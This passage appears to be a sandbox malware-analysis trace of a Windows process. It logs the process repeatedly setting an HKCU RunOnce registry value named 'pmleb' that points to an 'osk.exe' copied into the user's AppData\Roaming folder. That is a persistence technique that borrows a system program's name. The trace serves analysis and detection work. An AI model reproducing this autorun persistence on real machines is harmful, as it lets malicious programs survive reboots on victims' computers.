out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.347] RegCloseKey (hKey=0x280) returned 0x0 [0092.347] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.347] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.347] SetTimer (hWnd=0x20280, nIDEvent=0x21f7, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f7 [0092.347] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.357] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.357] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.358] KillTimer (hWnd=0x20280, uIDEvent=0x21f7) returned 1 [0092.358] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.358] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.358] IUnknown:Release (This=0x787518) returned 0x1 [0092.358] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.358] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.358] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.359] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.359] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7c [0092.359] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.359] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7d [0092.359] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.360] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7c [0092.360] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.360] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.360] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.360] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.360] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.361] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.361] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.361] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.361] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.361] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.361] RegCloseKey (hKey=0x280) returned 0x0 [0092.361] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.361] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.361] SetTimer (hWnd=0x20280, nIDEvent=0x21f8, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f8 [0092.362] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.373] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.373] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.373] KillTimer (hWnd=0x20280, uIDEvent=0x21f8) returned 1 [0092.373] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.374] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.374] IUnknown:Release (This=0x787518) returned 0x1 [0092.374] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.374] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.374] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.374] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.374] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.374] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.374] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.374] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.374] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.375] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7d [0092.375] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.375] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7e [0092.375] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.376] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7d [0092.376] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.376] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.376] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.376] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.377] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.377] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.377] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.377] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.377] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.377] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.378] RegCloseKey (hKey=0x280) returned 0x0 [0092.378] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.378] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.378] SetTimer (hWnd=0x20280, nIDEvent=0x21f9, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f9 [0092.378] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.396] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.396] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.396] KillTimer (hWnd=0x20280, uIDEvent=0x21f9) returned 1 [0092.397] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.397] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.397] IUnknown:Release (This=0x787518) returned 0x1 [0092.397] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.397] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.397] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.397] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.397] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.397] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.397] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.398] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.398] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.398] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7e [0092.398] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.398] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7f [0092.398] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.399] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7e [0092.399] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.399] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.399] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.399] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.399] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.399] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.399] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.400] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.400] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.400] RegCloseKey (hKey=0x280) returned 0x0 [0092.400] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.400] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.400] SetTimer (hWnd=0x20280, nIDEvent=0x21fa, uElapse=0xa, lpTimerFunc=0x0) returned 0x21fa [0092.400] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.404] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.404] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.404] KillTimer (hWnd=0x20280, uIDEvent=0x21fa) returned 1 [0092.405] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.405] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.405] IUnknown:Release (This=0x787518) returned 0x1 [0092.405] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.405] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.405] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, 